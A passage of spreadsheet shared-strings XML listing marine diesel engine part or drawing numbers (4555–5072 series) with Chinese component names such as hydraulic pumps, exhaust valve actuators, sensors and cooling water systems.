        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0105  HPS, FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0110  HPS/ELFI, Sep LPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0115  HPS/FIVA, Sep LPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0120  HPS/FIVA Sep LPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电机驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0125  HPS/FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电机驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0135</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> HPS LPS/FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0140</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> HPS LPS/FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0145  HPS/FIVA/Com LPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统泄漏检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0155 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力推动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0165 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油电平开关</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0165 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机气缸润滑限位开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0170 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>LPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压控制油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0171 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0171 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双壁管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4555-0180 ME-B </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电传动液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压气缸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压气缸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0550 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集积器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0551 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集积器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0610 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气时间单元数据</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-0611 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气时间单元</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-1001 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-1200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统齿轮箱数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4565-1201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4570-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4570-0540 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4570-0550 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4570-0901 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主液压管工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0111 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压气缸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0550 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压气缸装置蓄压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0701 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压蓄压器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0751 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-0800 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压液压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压供给装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-1100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵站</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-1200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应齿轮机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4572-1250 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应齿轮机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>45db</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4650-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4740-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-1001 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-1900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多用控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4765-1901 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多用控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-0700 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-1500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-1550 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-1600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁控制箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4772-1800 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>47</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>48</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>49</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程质量规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮台车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5040-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5045-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5045-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水预热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5055-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5065-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5065-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5072-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>50</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>51+82</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
